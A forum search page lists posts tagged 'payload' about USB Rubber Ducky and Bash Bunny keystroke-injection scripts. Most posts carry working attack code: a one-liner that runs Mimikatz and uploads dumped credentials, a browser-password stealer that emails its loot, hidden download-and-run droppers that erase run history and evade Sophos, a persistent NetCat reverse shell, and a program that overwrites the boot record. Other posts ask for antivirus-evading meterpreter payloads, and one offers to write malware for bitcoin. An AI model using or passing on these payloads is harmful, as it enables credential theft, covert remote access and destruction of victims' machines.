Search the Community

Showing results for tags 'payload'.

  1. In an Android environment, I want to go to the previous screen. I tried `ESCAPE` and `BACKSPACE` but was not successful. Other commands such as DOWNARROW and ENTER work correctly. The screen is in About device (in the Settings) and I want to go one screen back.
  2. Description: Exfiltrate GitHub username and email. Target: OSX. Download: GitHub.
  3. Hi, according to the documentation, the Q STRING command argument doesn't require quotes. During my work on an OSX layout for the Bash Bunny I discovered this strange behavior:
     LED SETUP
     ATTACKMODE STORAGE HID
     LED ATTACK
     # Lines 5-12 are just tests to check that the command works well with and without quotes
     # and that this behavior is the same on the short QUACK command
     QUACK STRING Hello World
     Q ENTER
     QUACK STRING "Hello World"
     Q ENTER
     Q STRING Hello World
     Q ENTER
     Q STRING "Hello World"
     Q ENTER
     Q STRING "<"
     Q ENTER
     Q STRING <
     Q ENTER
     LED FINISH
     Produces: Hello World Hello World Hello World Hello World <
     I expected: Hello World Hello World Hello World Hello World < < <
     The Bash Bunny gets stuck on line 15 (line 14 has been executed); my LED stays in LED ATTACK forever. It seems that using the STRING command with a symbol without quotes makes the Bunny sick (I have made the test with other symbols). When trying to press the [<] key it's the same: it's stuck.
     LED SETUP
     ATTACKMODE STORAGE HID
     LED ATTACK
     QUACK STRING Hello World
     Q ENTER
     QUACK STRING "Hello World"
     Q ENTER
     Q STRING Hello World
     Q ENTER
     Q STRING "Hello World"
     Q ENTER
     Q STRING "a"
     Q ENTER
     Q a
     Q ENTER
     Q STRING "<"
     Q ENTER
     Q <
     Q ENTER
     LED FINISH
     Is there something I misunderstood, or is it an issue?
  4. Windows Persistent Reverse Shell for Bash Bunny. Author: 0dyss3us (KeenanV). Version: 1.0. Description: Opens a persistent reverse shell through NetCat on the victim's Windows machine and connects it back to the attacker host. Targets: Windows 10 (working on support for older versions). Connection can be closed and reconnected at any time. Deploys in roughly 15-20 sec. Works with NetCat. Requirements: Have a working Bash Bunny :) STATUS LED: Purple: Setup. Amber (single blink): Installing and running scripts. Green: Finished. Installation and Execution: Plug in the Bash Bunny in arming mode. Move files from WindowsPersistentReverseShell to either switch folder. Edit the persistence.vbs file and replace ATTACKER_IP with the attacker's IP and PORT with whichever port you like to use (I use 1337). Save the persistence.vbs file. Unplug the Bash Bunny and switch it to the position the payload is loaded on. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec). Unplug the Bash Bunny and go to the attacker's machine. Listen on the port you chose in the persistence.vbs file with NetCat: run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs). If using Windows as the attacker machine, you must install Ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe in. Wait for the connection (should take no longer than 1 minute, as the PowerShell command runs every minute). Once a Windows cmd prompt appears... YOU'RE DONE!! You can disconnect and reconnect at any time as long as the user is logged in. Download: Click here to download.
  5. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
  6. I'm working with Kali Linux. I started getting into working with Metasploit, payloads... But here's the problem: I am not finding a way to create a payload that does not get detected by an antivirus. Please help 😄
  7. Running this on Windows 10. When I enter: STRING netsh wlan show profile “WiFi name” key=clear and run it in the command prompt, it works and shows the WiFi key in the clear for the specified network. But when I enter that line into the ducky encoder it changes the script to STRING netsh wlan show profile @wifi name@ key=clear and then the script no longer works. What am I missing? What is the script to get quotation marks after encoding? Thanks!
  8. Hi, I wanted to learn how to perform APT attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using an SSH reverse tunnel. I figure that if it is my own code it will not be detectable by AV. Unfortunately, the more I think about it, the more I come to the conclusion that once I have such a system shell, I still have to deliver a meterpreter payload, which will allow for more advanced work, and the antivirus will definitely detect it. I want to learn but I do not know what to do in such a situation. How do I create a meterpreter payload that will not be detected by AV? I see that msfvenom generates an already encoded payload. Is it possible to get such a payload unencrypted? Maybe if I changed its sources in pure C, it would be less detectable? I've tried veil, shellter, thefatrat, etc. But it does not help. Most AV immediately detect the payload. I am mainly interested in payloads on MS Windows. Later I want to try Android.
  9. Hello there, I'm writing my first payload for the USB Rubber Ducky. I need a key combination to hide a window; the only problem I have is that I need to do something IN the window, so I can't just banish it to the task bar. I hope you can help me. Greetings, Ares
  10. Hello, I'm wondering if it is possible to use if and else statements with the Rubber Ducky. I'm trying to make a payload to grab browser passwords and send them to a mail, but it works in Windows 7 and doesn't work in Windows 8 and 10. Here is my payload: DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER
      My problem is that this line "STRING start web.exe /stext pwd.txt" doesn't work on Windows 8 and 10, only on Windows 7. I tried doing it this way: "STRING start web.exe /stext > pwd.txt". It creates a pwd.txt, but it is empty. Any idea is appreciated!
  11. Can I run a payload (meterpreter/metasploit) on Android with the Rubber Ducky or Bash Bunny over WAN?
  12. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with Nyan Cat... AMAZING). I made a payload to overwrite your bootloader with the nyancat bootloader, which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC; USE A VM. 1. Download the precompiled boot.exe (the source code is here if you want to compile it yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create a folder exec on your ducky SD card and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it in DUCKY\exec\boot.bin. 4.
      Here is the Duckyscript (make sure your SD card is labeled DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier.
  13. Hey, I have made a group to build programs, tools, payloads, etc. If you have an idea or want to contribute, just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  14. Hey guys, my name is Patrick. I'm new in the hacking world; I'm learning. I have a question: I'm trying to download and execute a payload with my Rubber Ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please?
  17. Hello everyone, you may have seen my last post on the iMessage Taker. It was unstable and had timing issues. Well, today I am here to rectify the situation. I have vastly improved the script to allow for much quicker operation and reliability. Basically, the ducky script is quite small and edits a "scpt" that it downloads from a repo of mine. This script does require an internet connection. In order to change the script to send the messages to your email, all you need to do is change "YOUREMAIL" to your preferred email. It will then take iMessages from the computer and send them to you. Short and sweet! Enjoy! -wiredbrother https://pastebin.com/3fgET9zU P.S. Would love everyone's thoughts on this.
  18. Hey all, first post here! I am working on a payload that, when connected to an unlocked Android device, will open Gmail, attach a number of files, and then send the email. I am having issues with opening the "attach files" menu (the paperclip icon) because I cannot seem to see a way to get the keyboard to tab over to it. Here is what I have so far, tested on a Pixel XL, latest version, with an HP USB keyboard. Windows + G > Opens Gmail. CTRL + N > Create new email. someone@domain.com > Enter the desired destination email. ENTER > Confirms the email address you entered. TAB TAB > Moves cursor to Subject line > Add an email subject. TAB > Moves cursor to body. Text > Add text to body. Magic happens? This is where I cannot click the paperclip icon, but if I do it on the touch screen, I can finish it out with the keyboard... SHIFT + DOWN ARROW > Selects file(s). SHIFT + ENTER > Attaches files. CTRL + ENTER > Send the email. Any help or thoughts would be greatly appreciated! Cheers!
  19. Hello peeps! So I was thinking yesterday, can't we skip all that long payload typing to get a reverse shell? This is where I thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this: powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  20. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 characters long, which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract a .ZIP file, which allows us to stop a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to set up the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...
      Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage of this code is that you must be connected to the internet. PS: I'm not very good at PowerShell scripting.
  21. I am not sure if this is the right board to be talking about this. I am willing to code Trojans, viruses, bots and any other type of malware in exchange for bitcoins. It could do just about anything you want, for example: backdoor a system, destroy the entire computer, delete files, record video and audio, etc. PM me if you're interested.
  22. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So... why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has finished executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: write a file (with content) to the desktop; eject the CD/DVD tray (if it exists) -- thank PowerShell for making that possible; open the calculator application; message box -- powered by PowerShell. Information about the payload, the payload script itself and how to configure it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
  23. Please bear with me, this is a very noob question. In Bash Bunny, let's say in payload - switch1 - payload.txt, what would be the syntax to run another payload.txt, say from "payloads/library/test/payload.txt"? So payload/switch1/payload.txt would execute and run payloads/library/test/payload.txt. Thanks in advance, I know it's a very basic question.
  24. I'm new to the Bash Bunny but have had the Rubber Ducky since the beginning. Very basic question, which I guess I can test when I have some time. Since we now have a payloads folder outside of the switch payload, can we, inside the switch payload.txt, just point to another payload text that's in the payloads folder? Again, I know this is probably a very basic question; however, I didn't see any documentation anywhere. It would be nice to reference one or multiple other payloads from one script.
  25. I have a Rubber Ducky with the latest firmware, and when trying to deploy a payload on my MS Windows 7 company PCs and laptops nothing happens. But if I press the deploy button it works. The ducky is working correctly because I am able to deploy payloads on Linux machines using the same hardware as the Windows PCs, and on external PCs running Windows 7. All our computers are from Dell and we have a myriad of models (Optiplex, Latitude, etc.) running Windows 7 and 10; we are using ESET Endpoint Antivirus with real-time file system protection activated. I am inclined to think that the ducky is not working because some software is blocking it. Perhaps ESET? I would appreciate it if anyone could comment on this issue. Thanks. met.